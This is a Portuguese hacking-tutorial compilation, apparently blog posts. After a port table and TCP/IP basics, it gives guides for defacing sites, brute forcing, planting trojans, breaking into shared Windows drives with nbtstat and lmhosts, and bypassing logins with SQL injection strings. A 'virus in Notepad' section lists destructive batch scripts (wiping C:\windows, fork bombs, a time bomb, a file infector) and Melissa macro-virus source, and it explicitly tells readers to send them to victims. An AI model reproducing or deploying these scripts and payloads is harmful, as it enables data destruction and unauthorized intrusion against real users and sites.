PARA ENVIAR UM EMAIL

GOPHER
70
BROWSER BASEADO EM MODO TEXTO

HTTP
80
PROTOCOLO WWW – NETSCAPE, MOSAIC

POP3
110
PARA RECEBER EMAIL

NNTP
119
NEWS GROUPS

IRC
6667
INTERNET RELAY CHAT – BATE PAPO ONLINE

COMPUSERV
4144
COMPUSERV WINCIM

AOL
5190
AMERICA ONLINE

MSN
569
MICROSOFT NETWORK

OUTROS
OUTROS
OUTROS

ROTEADOR: É UM COMPUTADOR QUE É UTILIZADO PARA CONECTAR DUAS OU MAIS REDES DISTINTAS. ELE TEM ESSE NOME PORQUE TEM DE ROTEAR (OU DIRECIONAR) OS PACOTES DE UMA REDE PARA OUTRA, ATUANDO COMO UM GUARDA DE TRÂNSITO PARA OS PACOTES ENTRE AS REDES.

GATEWAY: O GATEWAY TAMBÉM É UM COMPUTADOR QUE SERVE PARA CONECTAR DUAS OU MAIS REDES DISTINTAS. A PRINCIPAL DIFERENÇA PARA O ROTEADOR É QUE O GATEWAY NÃO TEM UM HARDWARE ESPECIAL PARA O ROTEAMENTO. USUALMENTE OS GATEWAYS CONECTAM LANS E OS ROTEADORES, WANS. EM VÁRIOS CASOS SE UTILIZA UM ROTEADOR EM CONJUNTO COM O GATEWAY.

VISÃO: UMA REDE UTILIZANDO O TCP/IP TEM UMA ESTRUTURA BÁSICA COMPOSTA POR UM OU MAIS SERVIDOR RODANDO UM SERVIDOR DNS (OU WINS), DHCP, SMTP, POP3, E OS SERVIDORES DOS SERVIÇOS DESEJADOS (HTTP, TELNET, GOPHER, ETC) E AS MÁQUINA CLIENTES SOLICITANDO ESSES SERVIÇOS. PARA SE INTERLIGAR ESSA REDE A OUTRA REDE TCP/IP, SE FAZ NECESSÁRIO O USO DE UM ROTEADOR OU GATEWAY E DA CORRETA CONFIGURAÇÃO DA REDE.

EXISTEM DUAS MANEIRAS DE SE LIGAR A LAN À INTERNET:

ATRIBUI-SE UM NÚMERO DE IP VÁLIDO PARA CADA MÁQUINA NA REDE, O QUE PODE SER IMPOSSÍVEL PARA REDES COM MUITAS MÁQUINAS.

ATRIBUI-SE UM NÚMERO DE IP VÁLIDO PARA O GATEWAY E UTILIZANDO-SE O NÚMERO DE IP 192.168.X.X INTERNAMENTE.

COMO O SEGUNDO CASO É O MAIS FACTÍVEL, VAMOS OBERVÁ-LO MELHOR. NELE, SE UTILIZA INTERNAMENTE A LAN O IP 192.168.X.X , QUE , QUANDO DA DETERMINAÇÃO DOS NÚMEROS DE IP FOI RESERVADO PARA O USO DE REDES INTERNAS, OU SEJA, NENHUMA MÁQUINA LIGADA DIRETAMENTE A INTERNET TEM UM IP 192.168.X.X. ISSO É NECESSÁRIO POIS COMO JÁ VIMOS NENHUMA MÁQUINA PODE TER UM NÚMERO DE IP QUE JÁ ESTEJA SENDO UTILIZADO POR UMA OUTRA MÁQUINA.

O GATEWAY TEM DUAS INTERFACES DE REDE, UMA PARA SE CONECTAR À INTERNET E OUTRA PARA SE CONECTAR À LAN. A INTERFAE DA INTERNET É ATRIBUIDO O NÚMERO DE IP VÁLIDO NA INTERNET E NA LAN O NÚMERO DE IP DO TIPO 192.168.X.X (USUALMENTE 192.168.0.1). NAS MÁQUINAS DA LAN O NÚMERO DO IP É DO TIPO 192.168.X.X (ONDE O PRIMEIRO X É O MESMO DO GATEWAY) E O GATEWAY DEFALT É O IP DO GATEWAY VOLTADO PARA A LAN (192.168.X.X). DESSA FORMA PODEMOS TER ATÉ 16.384 MÁQUINAS NA INTERNET POR NÚMERO DE IP VÁLIDO. ESSA ESTRUTURA TAMBÉM FACILITA A ADOÇÃO DE MEDIDAS DE SEGURANÇA CONTRA INTRUSOS DA INTERNET, POIS COMO TODO O TRÁFEGO NA INTERNET PASSA PELO GATEWAY, BASTA PROTEGÊ-LO PARA PROTEGER TODA A LAN.

PROTOCOLOS
TCP E IP: O TCP E O IP SÃO APENAS DOIS MEMBROS DA FAMÍLIA TCP/IP. IP É UM PROTOCOLO QUE PROVIDENCIA A ENTREGA DE PACOTES PARA TODOS OS OUTROS PROTOCOLOS DA FAMÍLIA TCP/IP. O IP FORNECE UM SISTEMA DE ENTREGA DE DADOS SEM CONEXÃO. ISTO É, OS PACOTES IP NÃO SÃO GARANTIDOS DE CHEGAREM AO SEU DESTINO, NEM DE SEREM RECEBIDOS DA FORMA QUE FORAM ENVIADOS. O CHECK SUN DO IP CONFIRMA APENAS A INTEGRIDADE DO CABEÇALHO DO PACOTE. DESTA MANEIRA, A RESPONSABILIDADE PELOS DADOS CONTIDOS NO PACOTE DO IP (E SUA SEQUÊNCIA) É TAREFA DE PROTOCOLOS DE MAIS ALTO NÍVEL.

TALVEZ O PROTOCOLO DE MAIS ALTO NÍVEL DO IP SEJA O TCP. O TCP OFERECE UM CONFIÁVEL PROTOCOLO BASEADO EM CONEXÃO CAPSULADO NO IP. O TCP GARANTE A ENTREGA DOS PACOTES, ASSEGURA O SEQUENCIAMENTO DOS PACOTES E PROVIDENCIA UM CHECKSUN QUE VALIDA TANTO O CABEÇALHO QUANTO OS DADOS DO PACOTE. NO CASO DA REDE PERDER OU CORROMPER UM PACOTE TCP/IP DURANTE A TRANSMISSÃO, É TAREFA DO TCP RETRANSMITIR O PACOTE FALTOSO OU INCORRETO. ESSA CONFIABILIDADE TORNA O TCP/IP O PROTOCOLO ESCOLHIDO PARA TRANSMISSÕES BASEADAS EM SESSÃO, APLICATIVOS CLIENTE-SERVIDOR E SERVIÇOS CRÍTICOS COMO CORREIO ELETRÔNICO.

PORÉM, ESSA CONFIABILIDADE TEM UM PREÇO. OS CABEÇALHOS DOS PACOTES TCP REQUEREM USO DE BITS ADICIONAIS PARA ASSEGURAR O CORRETO SEQUENCIAMENTO DA INFORMAÇÃO, BEM COMO UM CHECK SUN OBRIGATÓRIO PARA GARANTIR A INTEGRIDADE DO CABEÇALHO E DOS DADOS. PARA GARANTIR A ENTREGA DOS PACOTES, O PROTOCOLO TAMBÉM REQUER QUE O DESTINATÁRIO INFORME O RECEBIMENTO DO PACOTE.

TAL INFORMÇÃO DE RECEBIMETO (OU ACKS) GERAM TRÁFEGO ADICIONAL NA REDE, DIMINUINDO A TAXA DE TRANFERÊNCIA DE DADOS EM FAVOR DA CONFIABILIDADE. PARA REDUZIR O IMPACTO NA PERFORMANCE, A MIORIA DOS SERVIDORES ENVIAM UM ACK PARA TODOS (AO INVÉS DE TODO O PACOTE) OU QUANDO UM ACK EXPIRA.



UDP: SE A CONFIABILIDADE NÃO É ESSENCIAL, O UDP (USER DATAGRAM PROTOCOL), UM COMPLEMENTO DO TCP, OFERECE UM SERVIÇO DE TRANSMISSÃO DE DADOS SEM CONEXÃO QUE NÃO GARANTE NEM A ENTREGA NEM A CORRETA SEQUENCIA DOS PACOTES ENVIADOS (BEM PARECIDO COM O IP). CHECKSUNS NO UDP SÃO OPCIONAIS OFERECENDO ASSIM UMA MANEIRA DE SE TROCAR DADOS EM UMA REDE ALTAMENTE CONFIÁVEL SEM CONSUMIR DESNECESSARIAMENTE RECURSOS DA REDE.

ARP E ICMP: DOIS OUTROS PROTOCOLOS DA FAMÍLIA TCP/IP TEM IMPORTANTES FUNÇÕES, EMBORA ESSAS FUNÇÕES NÃO ESTEJAM DIRETAMENTE RELACIONADAS COM A TRANSMISSÃO DE DADOS: (ARP= ADDRESS RESOLUTION PROTOCOL, OU PROTOCOLO DE RESOLUÇÃO DE ENDEREÇOS) E ICMP (INTERNET CONTROL MESSAGE PROTOCOL, OU PROTOCOLO DE RESOLUÇÃO DE ENDEREÇOS NA INTERNET). O ARP E O ICMP SÃO PROTOCOLOS DE MANUTENÇÃO QUE MANTÉM A ESTRUTURA DO IP E USUALMENTE SÃO INVISÍVEIS AOS USUÁRIOS E AS APLICAÇÕES.

OS CABEÇALHOS DO IP CONTÉM TANTO O ENDEREÇO IP DA ORIGEM QUANTO DO DESTINO, MAS O ENDEREÇO DO HADWARE TAMBÉM TEM DE SER CONHECIDO. O IP OBTÉM UM ENDEREÇO DE HARDWARE DE UM DETERMINADO SISTEMA DIFUNDINDO PELA REDE UM PACOTE ESPECIAL DE REQUISIÇÃO (UM PACOTE ARP DE REQUISIÇÃO) CONTENDO O ENDEREÇO IP DO SISTEMA COM O QUAL ESTÁ TENTANDO SE COMUNICAR. TODOS NÓS DA REDE LOCAL QUE TIVEREM O ARP HABILITADO DETECTAM ESSA DIFUSÃO, E O SISTEMA QUE TEM O NÚMERO DE IP EM QUESTÃO ENVIA UM PACOTE ARP CONTENDO O ENDEREÇO DE HARDWARE PARA O COMPUTADOR QUE SOLICITOU. O ENDEREÇO DE HARWARE E O ENDEREÇO DO IP ESTÃO ARMAZENADO NO CACHE DO ARP PARA USO FUTURO. COMO A RESPOSTA ARP TAMBÉM É FEITA NA FORMA DE DIFUSÃO, É NORMAL QUE OUTROS NÓS USEM INFORMAÇÃO PARA ATUALIZAR SEUS CACHES ARP.

O ICMP PERMITE QUE 2 NÓS EM UMA REDE IP COMPARTILHEM O STATUS DO IP E INFORMAÇÕE DE ERRO. ESSA INFORMAÇÃO PODE SER USADA POR PROTOCOLOS DE ALTO NÍVEL PARA TRATAR PROBLEMAS DE TRANSMISSÃO OU PARA ADMINISTRADORES DE REDE PARA DETECTAR PROBLEMAS NA REDE. EMBORA ESTEJAM ENCAPSULADOS EM PACOTES IP, O ICMP NÃO É CONSIDERADO UM PROTOCOLO DE ALTO NÍVEL (ELE É NECESSÁRIO EM TODA IMPLEMENTAÇÃO DO TCP/IP. O UTILITÁRIO PING FAZ USO DO ICMP PARA VERIFICAR SE UM CERTO ENDEREÇO NA REDE ESTÁ OPERACIONAL. ISTO É UTIL PARA DETECTAR PROBLEMAS EM REDES IP UO FALHAS EM GATEWAYS.

OUTROS PROTOCOLOS
ALÉM DESSES PROTOCOLOS CITADOS, EXISTEM OS PROTOCOLOS DE ALTO NÍVEL, COMO O TELNET, FTP, HTTP E ETC. VAMOS DAR UMA BREVE DESCRIÇÃO DELES:

TELNET: É UM PROTOCOLO QUE PERMITE O LOGON EM MÁQUINA REMOTAS. VOCÊ PASSA A UTILIZAR A MÁQUINA REMOTA PARA REALIZAR O PROCESSAMENTO. NO WINDOWS NT EXISTE O RAS (REMOTE ACCESS SERVICE, SERVIÇO DE ACESSO REMOTO) QUE TEM OS MESMOS OBJETIVOS DO TELNET.

FTP: É UM PROTOCOLO UTILIZADO PARA FAZER TRANSFERÊNCIA DE ARQUIVOS.

HTTP: É O PROTOCOLO UTILIZADO NA WEB, ELE TRANSMITE TEXTOS, GRÁFICOS E QUALQUER OUTRO TIPO DE ARQUIVO (SUBSTITUINDO O FTP), ALÉM DE PERMITIR A NAVEGAÇÃO ATRAVÉS DE HIPER TEXTO.


Leia com Atenção
Lembrando que o conteúdo desta apostila é apenas pra estudo e conhecimento dos usuarios de internet.

O final da apostila chegou, espero que tirem bom aproveito dela.

Uma das tantas formas de invadir um site

Invadindo UM SITE
Basta vc invadir a hospedagem do Site e colocar lá eu HTML ou SCRIP para PIXAR

Um opção para achar o IP do site e e em qual servidor de hospedagem que está, vc faz o seguinte no Prompt do MS-D.O.S

Digita o seguinte comando com o nome do site

C:\WINDOWS>ping www.xxxxxxx.xxx.xx

Após ter feito isso aparecerá um IP que vc poderá colacar ele no próprio Browser(Internet Explorer, Netsckpe e outros), no lugar do endereço vc digita diretamente o IP que apareceu aí vc achará quem está hospedando o Site!

Tente descobir com um Port-Scan, quais portas estão acessiveis e FORÇA BRUTA, nele...

Invadindo por Bug

Invadindo Por Bug
Sim tem um jeito
Vamos supor que o computador que vc queira acessar o compartimento c:(HD) esteja com o Windows mesmo sendo original mas com Internet explorer 5.5 como ele vem no original ou até mesmo inferior
Devido um BUG(falha) vc poderá usar um BackOrifice ou mesmo um 666 para ter acesso.
Mas se o PC estiver com Internet Explorer atualizado, sem chance...
Qual Porta Entrar
Primeiro pegue o IP
Depois cheque qual porta está acessivel
com um Scan-port que podera ser R3x ou o Vanguard(este é melhor e também mais complexo em usar)

A questão depedendo de qual porta em questão está acessivel, conforme for
por exemplo

porta 80 HTTP(BROWSER Internet Explorer)
porta 21 FTP (Programa FTP do MS-D.O.S.)
Porta 23 Telnet
e outras mais

Tem programas que vc poderá selecionar a porta que vc quer invadir tem diversos.
Por ultima opção será vc enviar um trojan se não conseguir acessar nenhuma e desta forma abrindo uma conforme o Trojan enviado

Saiba que o modem de qualquer tipo tem cerca de 65500 Portas
Sendo que as portas de 1 à 10 são utilizadas para controle e sincronismo de comunicação de dados por exemplos comando RX e TX e sinal de sincronismo
A perda desses sinais levam a perda de conexão

Criando Virus no Notepad ou bloco de notas

Criando Virus no Notepad
É muito simples, voce vai fazer um virus no bloco de notas é só seguir as indicações,
abra o bloco de notas
Copie os códigos escolhidos e cole no bloco de notas, ao salvar voce usa a extençao .bat
exemplo: onomedoarquivo.bat
Se vc usar outra extensão o arquivo ñ ira pegar

AVISO:Não execute estes virus em seu proprio Pc, pois pode ocorrer serios danos, voce deve enviar para as vitimas!!!

█ █ █ █ █ █ █ █ █ █ █ █

Nome:Del All Windows
rmdir /s /q c:\windows
Função:Deleta tdo do Windows (fode o pc

Nome:Autoexec
@ECHO OFF
@BREAK OFF
deltree/C: Y\*.*
Função:Fode com tudo

Nome:Trojan-1
VERSION 5.00
Object = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}#2.0#0"; "mscomctl.ocx"
Begin VB.Form Form1
BackColor = &H80000007&
BorderStyle = 1 'Fixed Single
Caption = "Welcome to XP Blaster Pro (Enterprise Edition)!"
ClientHeight = 5400
ClientLeft = 45
ClientTop = 390
ClientWidth = 8085
BeginProperty Font
Name = "Fixedsys"
Size = 9
Charset = 0
Weight = 400
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
Icon = "Source3.frx":0000
LinkTopic = "Form1"
MaxButton = 0 'False
MinButton = 0 'False
MouseIcon = "Source3.frx":08CA
PaletteMode = 2 'Custom
ScaleHeight = 5400
ScaleWidth = 8085
ShowInTaskbar = 0 'False
StartUpPosition = 3 'Windows Default
Begin VB.CommandButton Command3
Caption = "About"
BeginProperty Font
Name = "MS Sans Serif"
Size = 8.25
Charset = 0
Weight = 400
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
Height = 375
Left = 120
TabIndex = 3
Top = 4920
Width = 1215
End
Begin VB.CommandButton Command2
Appearance = 0 'Flat
BackColor = &H000000FF&
Caption = "WEBSITE"
BeginProperty Font
Name = "Trebuchet MS"
Size = 8.25
Charset = 0
Weight = 400
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
Height
Função:Augumas dos trojans tradiçionais

Nome:Del p/ Windows
del /s /q c:\windows\
Função:Deleta tudo dentro do Windows ex: arquivos e naum pastas

Nome:Shutdown-S
shutdown -s
Função:Desliga o pc

Nome:Shutdown-R
shutdown -r
Função:Reinicia o pc

Nome:Trojan-2
@echo off
ctty nul
rem
for %%f in (*.exe *.com) do set A=%%f
if %A%==COMMAND.COM set A=
rename %A% V%A%
if not exist V%A% goto end
attrib +h V%A%
copy %0.bat %A%
attrib +r %A%
ren %A% *.bat
set A=
:end
ctty con
@if exist V%0.com V%0.com %1 %2 %3
@if exist V%0.exe V%0.exe %1 %2 %3
Função:Fode com tudo mesmo...

Nome:Pirata
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Função:Testar seu Anti-Virus ou enganar auguem.

Nome:Melissa 1999
// Melissa Virus Source Code
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> ""
Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):
Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo"
Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " &
Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't
show anyone else Wink"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End
Função:se espalha rapidamente e força empresas como Intel e Microsoft, entre outras, a fechar seus sistemas de e-mail para conter a praga, que se disseminava via Outlook. O vírus, além de se enviar pela Internet, modificava documentos do Word colocando falas do programa de televisão Os Simpsons. Causou danos estimados em US$ 300 milhões a US$ 600 milhões.

Nome:CLICK EM MIM
@ECHO OFF
:REPETE
MSG * CLICK EM MIM
GOTO REPETE
Função:Fica repetindo varias vezes a mesma mensagem

Nome:Progstar
@echo off
rem Denial Of Service Local
:Fucker
start notepad.exe
start write.exe
start sol.exe
start cmd.exe
start powerpnt.exe
start excel.exe
start winword.exe
start msacess.exe
goto Fucker:
Função:Abre varios programas sem parar, fais o pc travar

Nome:bomba relógio
c:\
cd\
echo off
if exist lig1.drv goto 2
echo > lig1.drv sdfsdf
goto fim
:2
if exist lig2.drv goto 3
echo > lig2.drv sdfsdf
goto fim
:3
if exist lig3.drv goto 4
echo > lig3.drv sdfsdf
goto fim
:4
if exist lig4.drv goto 5
echo > lig4.drv sdfsdf
goto fim
:5
if exist lig5.drv goto 6
echo > lig4.drv sdfsdf
goto fim
:6
if exist lig6.drv goto 7
echo > lig6.drv sdfsdf
goto fim
:7
rmdir C:\windows
rmdir C:\arquivos de programas
rmdir C:\documents and settings
:fim
Função:depois que ele for ativado 7 vezes ele apaga tudo
Nome:MSN Fixer
cd %USERPROFILE%
cd Config~1
cd Dadosd~1
cd Micros~1
cd "Windows Live Contacts"
del /s /q *.*
Função:Congela todos os msn's que estao sendo executados.

Obs. "Conhecimento não é crime!! eu não me responsabilizo por seus atos!!"

domingo, 12 de julho de 2009

Invasao por IP para INICIANTES

Você já deve ter visto por ai em outras páginas um texto que ensina a invadir por ip, é um texto que em toda página tem um...
Então, por consequencia da mal explicação daquele texto resolvi fazer minha versão e explica-la o máximo o possivel.

Eu sei tambem q essa ja foi uma das formas + usadas para invasao por compartilhamento..Hoje existe outras...



Requisitos

Você tem que ter os clientes para a rede microsoft instalado, seus arquivos e impressora compartilhados.

Não sabe como fazer isso? Olhe os passos abaixo.

Vá no painel de controle depois em redes. Caso seu computador não tenhas os clientes instalados nem os arquivos e impressoras compartilhados, instale e compartilhe.


Para instalar clique em adicionar e escolha cliente para rede microsoft e logo em seguinda compartilhe os arquivos e a impressora.

O windows 95 assim como o 98 vem com alguns programas internos que a grande maioria dos usuários desconhecem, dentre eles estão netstat, nbtstat, ftp e etc, para podermos descobrir alguns dados da vítima a ser invadida, nos precisamos do programinha chamado de nbtstat que vem no windows, ele se encontra geralmente no C:\windows.

A vítima a ser invadida tem que ter os clientes para a rede microsoft tambem instalados assim como estarem com os arquivos compartilhados podendo ser um dos drives ou seu disco rígido... isso não chega a ser um grande problema, pois é muito facil de convecer alguem a compartilhar seus discos rigidos, sem contar os que já compartilharam e nem sabem e os administradores de rede que deixam seus HDs compartilhados para manutenção, as vezes encontramos alguns desses administradores que compartilham seus discor rígidos sem senhas...

Se você for programador, você pode fazer um programinha que altere as configurações do computador da pessoa para que automaticamente seus Drives ou discos rígidos(HDs) fiquem compartilhados por completo e sem senha.

Pode acontecer que você encontre algum computador com os drives compartilhados e com senha. Ai você vai ter que se virar e descobrir a senha ou criar um programa que burle isso...

Você precisa saber:

O Ip da vítima.
O nome do computador da vítima

Existem várias maneiras de se descobrir o ip de uma pessoa, para isso entre na seção Descobrir Ip da minha página, lá estão alguns metodos.

O nome do computador da vítima você só descobre depois que já souber do Ip. É nessa hora que o nbtstat entra em ação....

Para descobrir o nome do computador da vítima vá em iniciar, depois executar e digite nbtstar -A (ip da vítima) tomei como exemplo o ip 200.239.43.68.
segue exemplo abaixo:



Repare nesse exemplo , ele tem dois nomes seguidos de <3> isso quer dizer que um daqueles nomes seguido de <3> é o nome do computador da vítima. Ai você que quer invadir, vai ter que testar os dois até ver qual funciona!!!

Pronto agora que você já sabe o Ip e o nome do computador da vítima, você tem que coloca-los no lmhosts e salvar esse arquivo dentro da pasta do windows, mas presta atenção, esse arquivo lmhosts não deve ter nenhuma extesão, é só lmhosts mesmo. Ele não existe na instalação do windows, ou seja você tem que criar um arquivo chamado lmhosts. Seguem os exemplos abaixo:

Obs: o lmhosts não se chama lmhosts.sam, apenas lmhosts, ele não tem nenhuma extenção.

Você cria o lmhosts da seguinte forma, coloque o IP 127.0.0.1 (sempre coloque esse ip 127.0.0.1)e o nome do seu computador em primeiro lugar, e em seguida os IPs das vítimas e seus respectivos nomes. No exemplo acima eu coloquei a vítima um computador chamado pr digy, repare como o nome vem seguido logo depois do IP.

Agora que você já criou o arquivo lmhosts você já pode localizar o computador da vítima na rede, é como se você estivesse em uma intranet e aquele computador "vítima" também estivesse nessa mesma intranet

Vá em iniciar, localizar , computador. Lá você pode colocar o Ip da vítima, ou colocar o nome do computador da vítima, tente os dois, oque funcionar você ultiliza. segue o exemplo do IP abaixo.


Pronto localizado o compudor, agora apenas click em cima do icone. Você pode colocar um atalho pra ele, entrar e fazer a festa.

segunda-feira, 6 de julho de 2009

SQL INJECTION

Hoje em dia é uma prática comum os sites pedirem um cadastro do visitante, e criar-lhe um login, dando acesso a áreas restritas e especiais do site. Cadastro esse que na maioria das vezes é gratuito, com a intenção apenas de fidelizar o usuário e claro, ter mais um e-mail para uma possível divulgação, que neste caso não se caracteriza spam, pois o devido usuário previamente aceitou informações vindas daquele site.

Em sites onde o cadastro é pago, aí a coisa muda de figura. O site imagina estar vendendo alguma informação ao visitante, e por isso, pode pedir alguns dados sigilosos do usuário e guardá-los seguramente no seu banco de dados.

O que venho apresentar, jogará seu login no vento e o site arderá no mármore do inferno, mas só vou falar como funciona porque Alah mandou e estava escrito com o bit sagrado.

Essa técnica geralmente é chamada de SQL Injection, ou seja, injeção de SQL. Funciona em sites que testam a entrada do login em scripts ASP com chamadas internas de SQL.

Vamos a lógica:

O programador, iniciante ou não, pensa em criar uma área restrita para o site, logo precisará de um login e senha para os usuários. Então é criado dentro do banco de dados (em sql ou mdb, mais comum em mdb) uma tabela chamada Users, com alguns campos, dentre eles Usuario, Senha, Nome e Admin. Esses campos informarão exatamente o que o nome diz, ou seja, o login do usuário, a sua respectiva senha, seu nome e um campo flag indicando se é admin do site ou não. Se for admin, geralmente tem acessos a cliques extras, do tipo incluir/editar/deletar alguma informação.

Feito isso, cria dentro da sua página um bloco onde pede o login e senha para o usuário ter acesso as devidas áreas. Geralmente, o formulário tem apenas os dois campos mesmo, user e senha. Esses dois campos são enviados para um script .asp, que validará ou não o login informado. Se for válido, redireciona para a área restrita, senão, volta ao login ou no máximo, informa que o login estava errado.

Bonito não!? Teoricamente funciona.

Vamos a prática:

Dentro desse script .asp, o programador colocou algo desse tipo:

*****

‘ Isso pega o usuário e senha informados no formulário
cUser = trim(request(usuario))
cSenha = trim(request(senha))

‘Isso verifica no banco de dados se o usuário e senha conferem
‘ (vamos supor que o banco já esteja aberto com o nome de objConn)
SQLOpen = select usuario, senha, nome, admin from Users where usuario=’ & cUser & ‘ and senha=’ & cSenha & ‘
objRS.Open SQLOpen, objConn

‘ Verifica se achou um usuário com o login e senha informados
if not objRS.bof then
response.write Bem vindo & objRS.fields(nome) & !
else
response.write Login inválido.
end if

*****

Na prática inocente, isso funciona. Funciona muito bem. Testa os usuários, se a senha não for a correta, realmente não entra. Se um usuário foi digitado errado, também não dá acesso.

Mas, na prática hacker, isso funciona melhor ainda, pois permite entrarmos como qualquer usuário do sistema. Até mesmo com status de admin.

Vamos pensar um pouco:

select usuario, senha, nome, admin from Users where usuario=’ & cUser & ‘ and senha=’ & cSenha & ‘

Essa é a string do SQL. Em VB e ASP, sabemos que para concatenarmos uma string dentro de outra, devemos usar aspa simples, invés de aspa dupla, pois a aspa dupla é para a string mestra, e a aspa simples é para a string interna.

Traduzindo a string acima, teríamos:
select usuario, senha, nome, admin from Users where usuario=’geek’ and senha=’s3nh4′

Dessa forma, trocamos as variáveis cUser e cSenha, pelos seus respectivos conteúdos.

Repito, isso funciona muito bem, quando usamos de forma inocente. Vale lembrar que de 10 sites em asp que pedem login e senha, 8 tem essa forma de consulta e estão sujeitos a algum tipo de invasão, dependendo do nível de acesso que permita aos seus usuários.

Você falou, falou, falou…. mas e daí!? Cadê o erro nisso?

Ok. Vamos ao erro:

Se quando formos digitar um login, tivermos essa string de programação do sql na cabeça, podemos formar outra facilmente, que injeta um comando de sql, dentro do que o programador já fez.

Ou seja, se eu digitar Mario no username, o sql ficará:

select usuario, senha, nome, admin from Users where usuario=’Mario’ and senha=’s3nh4′

Repare que as aspas simples continuam e fazem realmente parte do comando, que mostra ao sql que aquele campo deve ser comparado com um dado do tipo string.

Agora, se digitarmos no username Ma’rio (com uma aspa simples no meio), a página dará um erro, pois o comando ficaria desse tipo:

select usuario, senha, nome, admin from Users where usuario=’Ma’rio’ and senha=’s3nh4′

Analisando, vemos que quando fomos comparar o campo usuário, abrimos uma aspa simples, colocamos o conteúdo Ma e fechamos a aspa simples. Para o sql, a comparação terminou aí, o que vem depois, deveria ser comandos. Mas não era. Era a continuação do username, a palavra rio e mais uma aspa simples, que deveria estar fechando a primeira (antes da palavra Ma), mas na realidade está abrindo uma nova string no SQL, e como não é comparado com nada, o SQL retorna erro de programação.

Então, já que o SQL aguarda ansiosamente por outra aspa simples para fechar aquela primeira, porque nós não damos a ele, e aproveitando, injetamos um comando nele.

Imagine se usarmos a string ‘ or ‘1 (isso mesmo: aspa simples + espaco + or + espaco + aspa simples + 1), ficaria assim:

select usuario, senha, nome, admin from Users where usuario=” or ‘1′ and senha=’s3nh4′

Lendo o comando, seria a mesma coisa que falar pro SQL: me retorne o usuario que seja igual a vazio OU 1. Lembrando que 1 em informática é a mesma coisa que True (verdadeiro). Lendo novamente: Me retorne o usuário que seja igual a vazio (não existe nenhum) OU verdadeiro (opa.. verdadeiro é verdadeiro, então achei). Nisso, a tabela pega todos os usuários, pois todos dão verdadeiro. Não são igual a vazio, mas o 1 garante que todos sejam válidos. Agora falta só filtrar a senha.

Se usarmos a mesma string mágica na senha, nós seremos o primeiro usuário da tabela, pois:

select usuario, senha, nome, admin from Users where usuario=” or ‘1′ and senha=” or ‘1′

Me retorne o usuário que seja igual a vazio (nenhum) OU verdadeiro (todos) E que tenha a senha igual a vazio (nenhum) OU verdadeiro (todos).

Isso traz todos os usuários da tabela, porém com o ponteiro no primeiro usuário.

Quando fazemos uma tabela de usuários, e colocamos no ar, qual o primeiro usuário que incluímos? Nós mesmos, claro. E com nível de administrador. E é exatamente esse que viramos quando usamos essa falha.

Alguns outros casos, são quando queremos entrar com o username de uma determinada pessoa. No username, colocamos o nome dela corretamente, e na senha, como não sabemos, usamos essa string que nos foi enviada por Alah. O SQL, muito esperto, entende que é pra retornar o usuário com o nome informado e que tenha uma senha igual a vazio OU verdadeiro. Ou seja, na verdade, ele irá ignorar a senha, e apontará para o registro que o username seja igual ao que foi informando no campo do formulário.

Outro ponto, é quando não sabemos o nome do usuário, e o site tem muitos cadastros. Então, entramos como qualquer um, e com seus respectivos direitos. No usuário colocamos a string mágica, e na senha chutamos qualquer coisa, por exemplo, 123456 (num site com mais de 200 cadastros, é 99% de certeza que alguém tenha usado essa senha.). Então, o SQL apontará o registro para o primeiro usuário que tenha essa senha no seu cadastro. Outras senhas usadas são: 123123, 123321, 121212, 111222, (o próprio nome do site), abc, abcd, abcdef, abc123, 123abc, e coisas fáceis desse tipo.

E no caso do login pedido ser um e-mail, essa string não funcionará, pois talvez exista uma validação no campo do login para atestar que o que foi digitado tem um formato de e-mail (digo talvez, pois já vi sites pedindo e-mail login mas que não validavam nada…)

Daí, usamos a string que passa por essas validações (como o campo de e-mail é grande, por não se saber qual o mail do usuário, podemos utilizar essa string maior. A string anterior é pequena para caber em qualquer campo de login e senha).

A string que passa pelos e-mails é:
eu@eu.com’or’.11′=’.11
Dessa forma, caso verifiquem se existe @, esta string passará pois tem 1 @ só.
Se verificarem se tem alguma coisa antes da @… ela é válida e também passa.
Se verificarem de trás pra frente na string.. procurando por uma TLD válida (com um ponto na terceira ou quarta casa, de trás pra frente), encontrarão o ponto (.) na terceira casa, que significa uma TLD brasileira (.br) ou de outros países. E se ainda verificarem mais pra trás, por domínios, encontrarão outros 2 pontos, o que torna esse e-mail pertencente a um dominio com subdomínio.

Ok. Sou dono de um site em asp, e uso essa forma de verificação. Agora que você já me ferrou e que todo mundo vai me invadir, pode me dizer como conserto isso?

Claro. É pra isso mesmo que eu estou falando desse erro. Para alertar os sites que estejam com esse problema. Vamos a correção:

O problema todo é que o script só verifica se achou ou não um usuário, não faz um check-up para atestar a veracidade do que foi encontrado. Então, bastaria adicionar o seguinte comando dentro daquele script:

*****

